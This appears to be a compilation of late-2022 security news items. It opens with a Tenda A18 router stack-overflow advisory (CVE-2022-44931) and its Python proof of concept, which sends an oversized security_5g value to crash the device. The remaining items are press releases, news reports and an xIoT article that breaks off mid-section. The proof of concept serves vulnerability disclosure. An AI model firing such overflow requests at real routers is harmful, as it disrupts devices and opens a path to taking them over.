Tenda A18 v15.13.07.09 was discovered to contain a stack overflow via the security_5g parameter at /goform/WifiBasicSet.

Permalink

Cannot retrieve contributors at this time

**Tenda A18 V15.13.07.09 Stack overflow vulnerability****Firmware information**

*   Manufacturer's address: https://www.tenda.com.cn/
    
*   Firmware download address: https://www.tenda.com.cn/download/detail-2760.html
    

**Affected version**

**Vulnerability details**

In /goform/WifiBasicSet, the user can control security\_5g, which will be copied to param\_5g by the strcpy function. It is worth noting that there is no size check, which leads to a stack overflow vulnerability

**Poc**

import socket
import os

li \= lambda x : print('\\x1b\[01;38;5;214m' + x + '\\x1b\[0m')
ll \= lambda x : print('\\x1b\[01;38;5;1m' + x + '\\x1b\[0m')

ip \= '192.168.0.1'
port \= 80

r \= socket.socket(socket.AF\_INET, socket.SOCK\_STREAM)

r.connect((ip, port))

rn \= b'\\r\\n'

p1 \= b'a' \* 0x3000
p2 \= b'security\_5g=' + p1

p3 \= b"POST /goform/WifiBasicSet" + b" HTTP/1.1" + rn
p3 += b"Host: 192.168.0.1" + rn
p3 += b"User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:102.0) Gecko/20100101 Firefox/102.0" + rn
p3 += b"Accept: text/html,application/xhtml+xml,application/xml;q=0.9,\*/\*;q=0.8" + rn
p3 += b"Accept-Language: en-US,en;q=0.5" + rn
p3 += b"Accept-Encoding: gzip, deflate" + rn
p3 += b"Cookie: password=1111" + rn
p3 += b"Connection: close" + rn
p3 += b"Upgrade-Insecure-Requests: 1" + rn
p3 += (b"Content-Length: %d" % len(p2)) +rn
p3 += b'Content-Type: application/x-www-form-urlencoded'+rn
p3 += rn
p3 += p2

r.send(p3)

response \= r.recv(4096)
response \= response.decode()
li(response)

You can see the router crash, and finally we can write an exp to get a root shell

CVE-2022-44931: IOT_Vul/readme.md at main · z1r00/IOT_Vul

Startup raises $8.5 million in seed funding led by Ten Eleven Ventures.

**CHARLESTON, S.C., Dec. 8, 2022 /PRNewswire/ —** Interpres Security, a company dedicated to helping companies optimize their security performance with a comprehensive new approach to managing the defense surface, announced its emergence from stealth alongside $8.5M in seed financing led by Ten Eleven Ventures. The Interpres Security platform offers a customized, continuous, and threat-informed analysis of an organization's detection and mitigation capabilities and provides automated security engineering directives based on this evaluation, ultimately enabling a hardened security posture in the most efficient manner possible.

To address the expanding number of cybersecurity threats, organizations now use an average of 76 tools in their security stack. Despite this level of investment, organizations still do not know how effective this tooling is against their specific and expanding threat profile. Without a clear picture of the most relevant threats or how well their current tools work against them, organizations do not have a complete view of how well-defended they are.

After experiencing a systems breach firsthand at a classified security operations center, members of the Interpres Security founding team developed a new Threat Centric Methodology to validate the effectiveness of all of the security vendors in the environment. This approach proved successful, and later the same methodology became the genesis for Interpres Security's automation of these capabilities into their new platform.

Interpres Security currently integrates the MITRE ATT&CK framework to prioritize threat coverage based on the adversaries most likely to target an organization, the malware and techniques those adversaries use, and the prevalence of those attacks as seen in the wild. It then recommends mitigations, telemetry collection strategies, and detection logic best suited to fill the prioritized gaps in coverage across the enterprise to detect and mitigate threats most likely to target the organization. It does all this while utilizing the organization's existing investment in cybersecurity products and solutions. Once the defense ecosystem is optimized, Interpres maintains this state through a situational awareness dashboard that detects drift in configuration and changes to risk posture while offering detailed board-level reporting.

"Until now, only large security engineering teams have even been able to attempt to analyze, validate, and optimize an organization's specific security toolset and processes. However, the detailed analysis and threat intelligence needed is extremely time-consuming and manually intensive to complete. The capabilities that we have automated within the Interpres platform goes beyond the scope of what humans can complete regularly, in real-time," said Nick Lantuh, Chief Executive Officer and Co-Founder at Interpres Security and former Founder and President of NetWitness (acquired by EMC in 2011). "It's time for a new approach. Automation and threat-informed prioritization are necessary to properly assess, configure, optimize and align current security tools to optimally defend against advanced threats in a timely manner. That's the value of the Interpres platform."

"We see CISOs regularly struggle to get a handle on which security tools are most effective for their organization's specific needs," said Mark Hatfield, General Partner at Ten Eleven Ventures and new board member at Interpres Security. "They want to hold the vendors accountable for what they've promised - to understand how well their tools stand up to threats they are most likely to face. The exceptional team at Interpres Security has developed a platform that does exactly that - help companies 'shrink the stack', get the most out of their existing cybersecurity investments, understand where they are and are not protected, rationalize product investments and harden their defenses."

**About Interpres Security**

Interpres Security makes security performance intelligible and provable for the enterprise with a comprehensive new approach to managing the defense surface. With Interpres, security teams can take a threat-informed perspective to understand what their current tools can detect and defend against, identify gaps and inefficiencies, and iteratively improve their security posture with a data-driven and custom tailored approach. Interpres Security is backed by top cybersecurity specialist investor, Ten Eleven Ventures. To learn more and request a demonstration of the platform, visit their website at InterpresSecurity.com and follow the company on LinkedIn or Twitter.

**About Ten Eleven Ventures**

Ten Eleven Ventures is the original cybersecurity-focused, global, stage agnostic investment firm. The firm finds, invests, and helps grow top cybersecurity companies addressing critical digital security needs, tapping its team, network, and experience to help build successful businesses. Since its founding, Ten Eleven Ventures has raised over $US 1 billion and made over 40 cybersecurity investments across stages worldwide, including KnowBe4, Darktrace, Twistlock, Verodin, Cylance, and Ping Identity. For more information, please visit www.1011vc.com or follow us on Twitter @1011vc.

Interpres Security Emerges from Stealth to Help Companies to Optimize Security Performance

A free resource, updated monthly, lists the most-popular, highly rated OSS projects.

In the past decade or so, open source software has become a critical component of many companies' tech stacks. The proliferation of cloud computing and artificial intelligence (AI) accelerated this trend, making open source projects such as Kubernetes, TensorFlow, Jenkins, and OpenCV more attractive to developers and infrastructure teams alike.

And security operations are no exception. Open source software has found its way into cybersecurity engineering and operations. Snort, OpenSSL, Yara, Wireshark, etc., are often found in organizations' arsenal of security tools. Open source is now fundamental to security operations, and building, supporting, and using open source tools is an integral part of InfoSec culture.

To better track the proliferation of open source software in cybersecurity infrastructure and applications, Andrew Smyth of Atlantic Bridge and I created The Open Source Security Index as a free resource for developers and security engineers to find and identify the best open source security technology. The index lists the top 100 most popular and fastest-growing security projects on GitHub. We emphasize _fast growing_ as we believe modern security operations are different from security in the past, when most deployments happened on-premises. As such, many of the fast-growing OSS projects are newer initiatives designed for modern infrastructure environments.

To build this index, we use the GitHub API to pull projects based on tags and topics, and manually added projects that lack labels. To constrain our scope, we limited the search to projects that are considered direct security tools. Those that have security implications but fall more into infrastructure capabilities, such as Terraform, Elastic, Istio, and Envoy, are not included here.

**How We Ranked the Entries**

Once we had the raw list, we ranked entries based on an "Index Score," which is a weighted average of six metrics retrieved from GitHub. They include:

*   Number of stars: 30%
*   Number of contributors (excluding bots and anonymous accounts): 25%
*   Number of commits the project had in the last 12 months: 25%
*   Number of watchers: 10%
*   Change in the number of watchers over the last month: 5%
*   Number of forks: 5%

Based on this scoring methodology, we list the top 100 GitHub projects on the The Open Source Security Index website. The index is an evolving, live project. We will refresh the data monthly to keep the list current.

While the top 25 list includes familiar tools like Metasploit, Wireshark, and OS Query, there are also relatively new entrants, such as Cilium, Checkov, and Calico, that are designed specifically for modern and cloud-native infrastructure.

Looking across the top 25 list, a few interesting trends emerge. They are:

*   **Attack and red-team open source tools remain popular:** Projects that provide effective attack and testing tools are prominently positioned on the list. Metasploit, OSS Fuzz, Atomic Red Team, and Zap are a few examples.
*   **Security for modern infrastructure is gaining popularity:** Unlike traditional security utilities, projects such as Cilium, Trivy, Calico, and Sysdig are becoming increasingly popular. Those projects are designed to work with newer, cloud-native infrastructure, such as Kubernetes, containers, and microservices. The fact that these projects are listed among the most popular shows that cloud computing is now mainstream with security operations.
*   **Automation and "as-code" workflow utilities have emerged:** It's also worth noting that projects that enable automation and "as-code" workflows have also appeared in the top list. For instance, Nuclei, a project that focuses on vulnerability-management-as-code, is a fast-growing project used by bug researchers, red teams, and defenders. Sigma is another project that enables automation and sharing of attack detection methods.

We believe that the evolution of open source security (OSS) will follow the same trajectory as enterprise infrastructure in embracing OSS models. An increasing number of security practitioners choose open source as a fundamental strategy because of its extensibility, flexibility, and transparency of implementation. In addition, sophisticated security teams have adopted the "shift-left" mindset, where managing security policies and operations is like managing "code." To this end, an open source strategy provides a clear advantage compared with the traditional way of developing and deploying proprietary software artifacts.

We created this index because we had a challenging time finding a good, representative list of open source security projects. Although imperfect, this index represents a starting point to build a structured and comprehensive list of meaningful open source tools for security practitioners to consider. We worked with many open source creators to build this list, and we welcome feedback at @OSecurityIndex.

Where to Find the Best Open Source Security Technology

Rapid7 Nexpose versions prior to 6.6.172 failed to reliably validate the authenticity of update contents. This failure could allow an attacker to provide a malicious update and alter the functionality of Rapid7 Nexpose. The attacker would need some pre-existing mechanism to provide a malicious update, either through a social engineering effort, privileged access to replace downloaded updates in transit, or by performing an Attacker-in-the-Middle attack on the update service itself.

*   Platform
    
    *   Platform Subscriptions
    *   Cloud Risk Complete
        
        Manage Risk
        
    *   Threat Complete
        
        Eliminate Threats
        
    
*   Products
    
    *   Insight Platform Solutions
    *   
    *   Threat Intelligence
        
        THREAT COMMAND
        
    *   Vulnerability Management
        
        INSIGHTVM
        
    *   Dynamic Application Security Testing
        
        INSIGHTAPPSEC
        
    *   Orchestration & Automation (SOAR)
        
        INSIGHTCONNECT
        
    *   Cloud Security
        
        INSIGHTCLOUDSEC
        
    
    *   More Solutions
    *   Penetration Testing
        
        METASPLOIT
        
    *   On-Prem Vulnerability Management
        
        NEXPOSE
        
    *   Digital Forensics and Incident Response (DFIR)
        
        Velociraptor
        
    
*   Services
    
    *   MANAGED SERVICES
    *   Detection and Response
        
        24/7 MONITORING & REMEDIATION FROM MDR EXPERTS
        
    *   Vulnerability Management
        
        PERFECTLY OPTIMIZED RISK ASSESSMENT
        
    *   Application Security
        
        SCAN MANAGEMENT & VULNERABILITY VALIDATION
        
    
    *   OTHER SERVICES
    *   Security Advisory Services
        
        PLAN, BUILD, & PRIORITIZE SECURITY INITIATIVES
        
    *   Product Consulting
        
        QUICK-START & CONFIGURATION
        
    *   Training & Certification
        
        SKILLS & ADVANCEMENT
        
    *   Penetration Services
        
        TEST YOUR DEFENSES IN REAL-TIME
        
    *   IoT Security Testing
        
        SECURE EVERYTHING CONNECTED TO A CONNECTED WORLD
        
    *   Premium Support
        
        PRIORITY HELP & FASTER SOLUTIONS
        
    
*   Support & Resources
    
    *   SUPPORT
    *   Support Portal
        
        CONTACT CUSTOMER SUPPORT
        
    *   Product Documentation
        
        EXPLORE PRODUCT GUIDES
        
    *   Release Notes
        
        DISCOVER THE LATEST PRODUCT UPDATES
        
    *   
    
    *   RESOURCES
    *   Fundamentals
        
        FOUNDATIONAL SECURITY KNOWLEDGE
        
    *   Blog
        
        THE LATEST INDUSTRY NEWS AND SECURITY EXPERTISE
        
    *   Resources Library
        
        E-BOOKS, WHITE PAPERS, VIDEOS & BRIEFS
        
    *   Extensions Library
        
        PLUGINS, INTEGRATIONS & DEVELOPER COMMUNITY
        
    *   Partners
        
        RAPID7 PARTNER ECOSYSTEM
        
    *   Webcasts & Events
        
        UPCOMING OPPORTUNITIES TO CONNECT WITH US
        
    *   Vulnerability & Exploit Database
        
        SEARCH THE LATEST SECURITY RESEARCH
        
    
*   Company
    
    *   OVERVIEW
    *   
    *   Leadership
        
        EXECUTIVE TEAM & BOARD
        
    *   News & Press Releases
        
        THE LATEST FROM OUR NEWSROOM
        
    *   
    *   Our Customers
        
        Their Success Stories
        
    
    *   COMMUNITY & CULTURE
    *   Social Good
        
        OUR COMMITMENT & APPROACH
        
    *   Rapid7 Cybersecurity Foundation
        
        BUILDING THE FUTURE
        
    *   Diversity, Equity & Inclusion
        
        EMPOWERING PEOPLE
        
    *   Open Source
        
        STRENGTHENING CYBERSECURITY
        
    *   Public Policy
        
        ENGAGEMENT & ADVOCACY
        
    
*   RESEARCH
*    Sign In

*   All Products
    
    *   AppSpider
    *   Insight Agent
    *   InsightAppSec
    *   InsightCloudSec
    *   InsightConnect
    *   Insight Platform
    *   InsightIDR
    *   Insight Network Sensor
    *   InsightOps
    *   InsightVM
    *   Metasploit
    *   Nexpose
    *   tCell
    *   Managed Services
    

*   Platform
    
    *   Platform Subscriptions
    *   Cloud Risk Complete
        
        Manage Risk
        
    *   Threat Complete
        
        Eliminate Threats
        
    
*   Products
    
    *   Insight Platform Solutions
    *   
    *   Threat Intelligence
        
        THREAT COMMAND
        
    *   Vulnerability Management
        
        INSIGHTVM
        
    *   Dynamic Application Security Testing
        
        INSIGHTAPPSEC
        
    *   Orchestration & Automation (SOAR)
        
        INSIGHTCONNECT
        
    *   Cloud Security
        
        INSIGHTCLOUDSEC
        
    
    *   More Solutions
    *   Penetration Testing
        
        METASPLOIT
        
    *   On-Prem Vulnerability Management
        
        NEXPOSE
        
    *   Digital Forensics and Incident Response (DFIR)
        
        Velociraptor
        
    
*   Services
    
    *   MANAGED SERVICES
    *   Detection and Response
        
        24/7 MONITORING & REMEDIATION FROM MDR EXPERTS
        
    *   Vulnerability Management
        
        PERFECTLY OPTIMIZED RISK ASSESSMENT
        
    *   Application Security
        
        SCAN MANAGEMENT & VULNERABILITY VALIDATION
        
    
    *   OTHER SERVICES
    *   Security Advisory Services
        
        PLAN, BUILD, & PRIORITIZE SECURITY INITIATIVES
        
    *   Product Consulting
        
        QUICK-START & CONFIGURATION
        
    *   Training & Certification
        
        SKILLS & ADVANCEMENT
        
    *   Penetration Services
        
        TEST YOUR DEFENSES IN REAL-TIME
        
    *   IoT Security Testing
        
        SECURE EVERYTHING CONNECTED TO A CONNECTED WORLD
        
    *   Premium Support
        
        PRIORITY HELP & FASTER SOLUTIONS
        
    
*   Support & Resources
    
    *   SUPPORT
    *   Support Portal
        
        CONTACT CUSTOMER SUPPORT
        
    *   Product Documentation
        
        EXPLORE PRODUCT GUIDES
        
    *   Release Notes
        
        DISCOVER THE LATEST PRODUCT UPDATES
        
    *   
    
    *   RESOURCES
    *   Fundamentals
        
        FOUNDATIONAL SECURITY KNOWLEDGE
        
    *   Blog
        
        THE LATEST INDUSTRY NEWS AND SECURITY EXPERTISE
        
    *   Resources Library
        
        E-BOOKS, WHITE PAPERS, VIDEOS & BRIEFS
        
    *   Extensions Library
        
        PLUGINS, INTEGRATIONS & DEVELOPER COMMUNITY
        
    *   Partners
        
        RAPID7 PARTNER ECOSYSTEM
        
    *   Webcasts & Events
        
        UPCOMING OPPORTUNITIES TO CONNECT WITH US
        
    *   Vulnerability & Exploit Database
        
        SEARCH THE LATEST SECURITY RESEARCH
        
    
*   Company
    
    *   OVERVIEW
    *   
    *   Leadership
        
        EXECUTIVE TEAM & BOARD
        
    *   News & Press Releases
        
        THE LATEST FROM OUR NEWSROOM
        
    *   
    *   Our Customers
        
        Their Success Stories
        
    
    *   COMMUNITY & CULTURE
    *   Social Good
        
        OUR COMMITMENT & APPROACH
        
    *   Rapid7 Cybersecurity Foundation
        
        BUILDING THE FUTURE
        
    *   Diversity, Equity & Inclusion
        
        EMPOWERING PEOPLE
        
    *   Open Source
        
        STRENGTHENING CYBERSECURITY
        
    *   Public Policy
        
        ENGAGEMENT & ADVOCACY
        
    
*   RESEARCH

*   Sign In

*   Documentation
*   All Products
    
    *   AppSpider
    *   Insight Agent
    *   InsightAppSec
    *   InsightCloudSec
    *   InsightConnect
    *   Insight Platform
    *   InsightIDR
    
    *   Insight Network Sensor
    *   InsightOps
    *   InsightVM
    *   Metasploit
    *   Nexpose
    *   tCell
    *   Managed Services

CVE-2022-4261: Nexpose Release Notes

Certifi is a curated collection of Root Certificates for validating the trustworthiness of SSL certificates while verifying the identity of TLS hosts. Certifi 2022.12.07 removes root certificates from "TrustCor" from the root store. These are in the process of being removed from Mozilla's trust store. TrustCor's root certificates are being removed pursuant to an investigation prompted by media reporting that TrustCor's ownership also operated a business that produced spyware. Conclusions of Mozilla's investigation can be found in the linked google group discussion.

CVE-2022-23491: concerns about Trustcor

At AWS re:Invent last week, the cloud giant previewed security services including Amazon Security Lake for security telemetry, Verified Permissions for developers, and a VPN bypass service.

Cloud threats will continue to grow and proliferate in 2023, but organizations can meet the challenges head-on with the right security fundamentals in place, Amazon Web Services CISO CJ Moses said during AWS re:Invent 2022 conference last week.

Malicious activity is on the rise: The volume of DDoS events in AWS between January and September of this year rose 35% compared with the same period in 2021. AWS saw a 256% increase in compromised instances compared with the fourth quarter of 2021.

AWS unveiled new security tools to help enterprise security teams with analyzing security telemetry, permissions management, and key management.

**Gathering Threat Telemetry**

First up was Amazon Security Lake to manage threat intelligence data. AWS CEO Adam Selipsky said Amazon Security Lake would allow organizations to gather security telemetry and data from many sources, clean it up, and make it accessible for analysis. The challenge lies in the fact that security data exists in multiple formats. The new Open Cybersecurity Schema Framework standard, announced last August during Black Hat USA, can be used to normalize security logs and events data across a wide range of products and services, Selipsky said.

Asked whether supporting OCSF members have conducted comprehensive interoperability tests or certification efforts, Splunk distinguished engineer Paul Agbabian explained to Dark Reading how the data is normalized. 

"For an event class to be considered in OCSF, there must be a real implementation of the class via one of the member's example logs," he said. "In addition, OCSF uses a server that can test each implementation of the schema for validation, which includes showing notable errors and violations."

"Increasing threats and risks continue driving the shift to the cloud, where security will be built into everything organizations do up and down their technology stack and across their teams," Moses said. "More and more security can be thought of as a data science problem."

AWS said FINRA, Salesforce, and Tinder are the first customers using Amazon Security Lake. Fernando Montenegro, a senior principal analyst at Omdia, said Amazon Security Lake was the most significant new security offering announced at last week's conference.

"Security Lake is obviously notable as it addresses some of the security 'undifferentiated heavy lifting' that AWS likes to address," Montenegro told Dark Reading. "It's still early, but the expectation is that it can help simplify security analytics at scale. The use of the OCSF standard is also notable, as it can herald easier data integration even outside of AWS environments."

**Verified Permissions for Developers**

A preview of Amazon Verified Permissions is now available, which Moses described as a scalable, fine-grained permissions management and authorization service for custom applications. 

"It gives developers a consistent way to define and manage fine-grained permissions across applications, simplifies changing permission roles without a need to change code, while also improving visibility to permissions," he explained.

Amazon Verified Permissions gives application administrators "a comprehensive audit capability that scales millions of policies using automated reasoning," Moses added. "Authorization requests running through Amazon Verified Permissions are evaluated in milliseconds to provide dynamic real-time decisions."

**Remote Access Without a VPN**

Amazon also released the preview of AWS Verified Access, a new connectivity service that provides secure remote access to corporate applications without requiring a VPN. According to AWS, the new service only grants access to applications if users and their devices meet defined security requirements.

AWS noted that Verified Access validates each application request, regardless of user or network, before granting access. 

"AWS Verified Access should help with the burden of accessing AWS resources in a 'zero trust' manner,'" Omdia's Montenegro said.

**External Key Store (XKS) for AWS KMS**

Amazon also announced its AWS Digital Sovereignty Pledge, which the company describes "as its commitment to offering all AWS customers the most advanced set of sovereignty controls and features available in the cloud."

Previously, customers have had to choose between "the full power of AWS and a feature-limited sovereign cloud solution that could hamper their ability to innovate, transform, and grow. We firmly believe that customers shouldn't have to make this choice," explained AWS senior VP Matt Garman in a blog post.

Effectively, AWS is promising to enable its complete offerings to maintain the growing set of digital sovereignty industry and regional regulations. Moses said the new External Key Store (XKS) for the AWS Key Management Service (KMS) supports the pledge because it lets organizations store and utilize their encryption keys outside of AWS.

"Customers can now store AWS KMS customer-managed keys outside of AWS on hardware security modules, whether they operate on-premises or anywhere else they would like to do so," he said. "XKS supports all the critical features of KMS and works with the over 100 AWS services that already integrate with KMS customer keys."

A user can encrypt data with external keys for most AWS services that support AWS KMS customer-managed keys, including Amazon EBS, AWS Lambda, Amazon S3, Amazon DynamoDB, and over 100 more services. The external key store forwards API calls to securely connect with a customer's hardware security module (HSM). According to an AWS blog post, the data describing the key never leaves the HSM.

Key Security Announcements From AWS re:Invent 2022

By Habiba Rashid
The bank confirmed that it had "experienced an unprecedented cyber attack from abroad."
This is a post from HackRead.com Read the original post: IT Army of Ukraine Hit Russian Banking Giant with Crippling DDoS Attack

Russia’s second-largest bank experienced the largest cyber attack (**DDoS attack**) in its history. The government-controlled St Petersburg-based VTB financial institution announced on Tuesday that it was experiencing an “unprecedented cyber attack from abroad.”

The bank warned customers of temporary difficulties in accessing its mobile app and website due to the ongoing DDoS attack (distributed denial of service attack) but assured them that their data remained safe. VTB stores its customer data in the internal perimeter of its infrastructure which the attackers did not breach.

According to the bank’s internal analysis and as **reported** by local Russian media, this DDoS attack was pre-planned and orchestrated to cause hindrance in the bank’s functionalities and to inconvenience its customers. Despite the bank’s online portals being inaccessible, all other core banking services are operating as usual.  

VTB stated that they identified most of the malicious DDoS requests from “foreign segments of the internet,” but some network-flooding traffic also originated from Russian IP addresses which the bank noted was “of particular concern.” 

Either foreign actors used local proxies for some of the attacks or they managed to recruit local dissidents in their **DDoS campaign**. The bank stated that it will hand over all the information regarding the Russian IP addresses to law enforcement for criminal investigation. 

What makes this DDoS attack particularly interesting in light of the recent political events is that VTB is 61% state-owned, implying that the attackers made an indirect blow at the Russian government. 

On Dec 6, 2022, in a **tweet**, the pro-Ukraine hacktivist group, going by the name ‘IT Army of Ukraine,’ claimed responsibility for the DDoS attacks against VTB, announcing the campaign on Telegram and Twitter.

According to the IT Army of Ukraine, over 900 Russian entities, including stores selling military equipment and drones, the Central Bank of Russia, the National Center for the Development of Artificial Intelligence, and Alfa Bank, have been targeted by the group since they started being more active in November. 

It is worth noting that the IT Army of Ukraine along with the hacktivist group Anonymous also took responsibility for **September 2022’s social engineering attack** in which the Russian Yandex taxi app was hacked to cause a massive traffic jam in Moscow.

On the other hand, Microsoft **warns** Europe to be on alert for cyber attacks from Russia because this attack follows a series of cyber campaigns launched against Russian organizations. 

Last week, **reports of data-wiping trojan** deployed against Russian mayors’ and courts’ computers surfaced. The media reported that the wiper poses as ransomware and demands half a million rubles and deletes files regardless of whether the organization pays the amount or not. 

With the latest round of wiper and DDoS attacks, GM of Microsoft’s Digital Threat Analysis Centre Clint Watts warns Europe that Russia is likely to expand its “hybrid-war” efforts beyond Ukraine. He further stated that the Kremlin might use such state-sponsored attacks to disrupt foreign supply chains. 

European nations and the US should also brace for more Kremlin-backed influence operations – preying on citizens’ concerns about rising energy prices and inflation, and pushing pro-Russian narratives, Watts wrote. 

1.  **Anonymous Hacktivists Leak 1TB of Top Russian Law Firm Data**
2.  **Ukraine Busts Pro-Russia Hackers Who Stole 30M EU Citizens’ data**
3.  **OldGremlin Gang Known for Targeting Russia Launches Linux Malware**
4.  **Russian Ministry Website Hacked to Display “Glory To Ukraine” Message**
5.  **Ukraine Thwart Russian Industroyer 2 Malware Attack on Energy Provider**

I’m a student and cybersecurity writer. On a random Sunday, I am likely to be figuring out life and reading Kafka.

IT Army of Ukraine Hit Russian Banking Giant with Crippling DDoS Attack

On cybercrime forums, user complaints about being duped may accidentally expose their real identities.

Nobody is immune to being scammed online—not even the people running the scams. Cybercriminals using hacking forums to buy software exploits and stolen login details keep falling for cons and are getting ripped off thousands of dollars at a time, a new analysis has revealed. And what’s more, when the criminals complain that they are being scammed, they’re also leaving a trail of breadcrumbs of their own personal information that could reveal their real-world identities to police and investigators.

Hackers and cybercriminals often gather on specific forums and marketplaces to do business with each other. They can advertise upcoming work they need help with, sell databases of people’s stolen passwords and credit card information, or tout new security vulnerabilities that can be used to break into people’s devices or systems. However, these deals often don’t go to plan.

The new research, published today by cybersecurity firm Sophos, examines these failed transactions and the complaints people have made about them. “Scammers scamming scammers on criminal forums and marketplaces is much bigger than we originally thought it was,” says Matt Wixey, a researcher with Sophos X-Ops who studied the marketplaces.

Wixey examined three of the most prominent cybercrime forums: the Russian-language forums Exploit and XSS, plus the English-language BreachForums, which replaced RaidForums when it was seized by US law enforcement in April. While the sites operate in slightly different ways, they all have “arbitration” rooms where people who think they’ve been scammed or wronged by other criminals can complain. For instance, if someone purchases malware and it doesn’t work, they may moan to the site’s administrators.

The complaints sometimes lead to people getting their money back, but more often act as a warning for other users, Wixey says. In the past 12 months—the period the research covers—criminals on the forums have lost more than $2.5 million to other scammers, the analysis says. Some people complain about losing as little as $2, while the median scams on each of the sites ranges from $200 to $600, according to the research, which is being presented at the BlackHat Europe security conference.

The scams come in multiple forms. Some are simple, others are more sophisticated. Frequently, there are “rip-and-run” scams, Wixey says, where the buyer doesn’t pay for what they’ve received or the seller gets the money but doesn’t send across what they sold. (These are often known as “rippers.”) Other types of scams involve faked data or security exploits that don’t work: One person on BreachForums claimed a seller tried to send them Facebook data that was already public.

In one extreme incident on the Exploit forum, an account posted a lengthy complaint that they had provided someone with a Windows kernel exploit and hadn’t been paid the $130,000 they had agreed for it. The buyer said they would pay once they had tested the software but never stumped up the cash. “At each stage, he gave different excuses for delaying the payment,” a translated version of the complaint says. 

In some scams, multiple accounts or people appeared to work together, the research says. A user with a good reputation can introduce one person to another. This accomplice then directs the victim to a scam website. In one instance, Wixey says, a user wanted to buy a fake copy of the NFT-focused game _Axie Infinity_. “They wanted a fake copy of it with the intent of basically siphoning off legitimate user’s funds,” Wixey says. “They bought this fake copy from someone else, and the fake copy contained a backdoor which then stole the stolen cryptocurrency.” The scammer was essentially being scammed through their own scam.

While it shouldn’t be a surprise that criminals often try to con each other—there’s no honor among cybercriminals, after all—the research shows how prevalent it is. In 2017, security firm Digital Shadows pointed out a database that had been created to name and shame known rippers. Similarly, in 2021, the firm found that some administrators on cybercrime forums are scamming their own customers. In the past decade, there have been thousands of complaints about criminals scamming each other, according to threat intelligence firm Analyst1. Meanwhile, a previous analysis from TrendMicro concluded that while forums and marketplaces have rules, they don’t deter scammers. “The perpetrators are typically those who go for quick profits over reputation,” the firm’s 2019 research says.

Arguably, the most organized scam that Sophos’ Wixey spotted stemmed from an investigation into the Genesis marketplace, which has been online since 2017 and sells hotel login details, cookies, and access to data from compromised systems. When researching Genesis, Sophos discovered a faked version of the website appearing high in Google’s search results. “This is a really bizarre case,” Wixey says. “It was a really basic WordPress template and it asked for money, whereas the real Genesis is invitation only.”

As well as not looking like the official Genesis market, the faked version showed other weird behaviors: It linked out to another cybercrime website, the Bitcoin address people could make payments to changed when someone clicked the copy and paste button on the website, and it was also being advertised on Reddit. These signs, Wixey says, hinted the fake could be a “coordinated” effort. Armed with details from the fake Genesis website—including portions of the text and cryptocurrency addresses—the researchers discovered 20 websites that all appear to be connected and run by the same group or individual. The websites all look the same and were registered between August 2021 and June 2022—eight of them are still live. 

Almost all of these websites, Wixey says, imitate defunct criminal marketplaces and try to get people to pay to access them. The scam appears to work, too. The researcher says the Bitcoin addresses the scam sites pay into have collectively received $132,000, although he is cautious to say the money may all have come from the false websites. Sophos appeared to find one threat user who may be behind the sites—an actor going by the handle “waltcranston.” Among several pieces of information linking the handle to the sites, someone with the username claimed to have created the fake marketplaces on another forum.

Despite not being able to fully confirm that waltcranston is behind the network of fake sites, Wixey says that criminals complaining about being scammed and trying to resolve their disputes through arbitration can be a potential rich source of intelligence for investigators. 

Because those complaining about scams need to post evidence to back up their claims, they often share screenshots containing more personal information than they may have intended. Sophos says it saw a “treasure trove” of data, including cryptocurrency addresses, transaction IDs, email addresses, victims’ names, some malware source code, and other information. All these details may help to uncover more information about the people behind the usernames or provide clues about how they operate.

In one scamming complaint, a user shared a screenshot that showed someone’s Telegram usernames, email addresses, Jabber chat names, plus Skype and Discord usernames. In others, IP addresses and countries where users may be situated are displayed. Screenshots reveal the software people use, as well as the websites they visit and details about their computer setup. In some instances, Wixey saw details of victims that the cybercriminals had targeted.

Criminals, by the nature of what they’re doing, are usually very cautious about sharing anything that may identify them. Real names are not used; they often will use anonymization services such as Tor. “They typically employ pretty good operational security, but with scam reports, that’s not so much the case,” Wixey says. “So much of this stuff is just not available anywhere else on these marketplaces.” Going forward, the data could prove a useful tool for tracking down some of the criminals. “It’s certainly a starting point,” Wixey says.

Scammers Are Scamming Other Scammers Out of Millions of Dollars

A world of increasingly connected devices has created a vast attack surface for sophisticated adversaries.

The explosion in connected devices, ranging from the Internet of Things to networking devices and operational technology (collectively known as the Extended Internet of Things, or xIoT), has created a vast, diverse, and largely unmapped attack surface that sophisticated adversaries are actively exploiting.

This growing risk is reflected in many recent reports from companies like Microsoft, Intel 471, and Zscaler that have found a significant uptick in both targeted and untargeted attacks on these devices, with a high rate of malware infections.

However, these threats — particularly when they target IoT devices — are often misunderstood or dismissed, as companies tend to view them as less significant than a traditional network attack. Part of the reason for this is the mistaken belief that IoT threats are mostly limited to botnet malware used for cryptomining and distributed denial-of-service (DDoS) attacks. In reality, IoT attacks are becoming much more sophisticated and now pose serious threats to corporate network integrity, data security, and even physical security systems.

Here are three xIoT attacks every company should be aware of:

**Pivoting From the xIoT Device**

Since many xIoT devices lack even basic native cybersecurity protections, disallow the installation of traditional endpoint security software, and are often unmonitored, they are an effective initial access point for attackers looking to gain a beachhead on a company and then move laterally across its network.

Once the xIoT device has been compromised, the adversary can use this foothold to upload tools, sniff network traffic, search for other exploitable devices, and exfiltrate sensitive data. For example, an attacker can transition from an IoT device into the main IT network, as well as the operational technology (OT) network.

This type of "pivot attack" has already been observed in the wild by multiple companies. My company has seen a growing number of corporate cyberattacks, in which the company was first compromised through a security camera, door controller, or other device, then targeted with ransomware, espionage, or data theft through its IT network.

In 2019, Microsoft Threat Intelligence Center detected an adversary that exploited three different IoT devices (a VoIP phone, a printer, and a video decoder), from which the actor established a presence on the network while looking for further access. Researchers also unveiled a proof-of-concept ransomware that can spread from an xIoT device to an IT network.

**Atypical Data Theft**

xIoT devices can also be direct targets of espionage and data theft.

Certain office devices like connected printers and document scanners are storehouses of sensitive corporate information that is largely unprotected. In the healthcare industry, CT scanners and MRI machines also contain valuable personal and medical information. Industrial devices can pose data breach risks too. Certain OT devices, like programmable logic controllers (PLCs), can contain privileged manufacturing and processing details, such as temperature and pressure ranges, chemical mixing.

This type of sensitive data storage in xIoT devices is often overlooked by traditional information security audits, and the devices themselves offer little, if any, data protection. For remote attackers, gaining access to these devices is usually a trivial matter.

My company has found that 50% of xIoT devices use default passwords, 68% of devices have high-risk or critical CVEs in their firmware, and 26% of these devices are end-of-life and no longer supported. This means in literally half of these cases, all an attacker needs to do is enter in a default password to gain access to privileged data.

**xIoT as a Persistence Strategy**

